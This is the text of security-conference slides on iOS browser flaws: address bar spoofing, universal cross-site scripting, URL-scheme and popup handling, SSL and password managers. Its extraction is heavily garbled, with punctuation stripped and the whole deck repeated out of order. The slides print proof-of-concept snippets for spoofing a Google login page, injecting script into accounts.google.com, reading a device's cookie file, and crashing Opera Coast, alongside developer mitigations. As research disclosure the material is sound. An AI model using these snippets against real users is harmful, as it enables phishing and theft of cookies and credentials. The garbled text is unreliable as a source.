bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
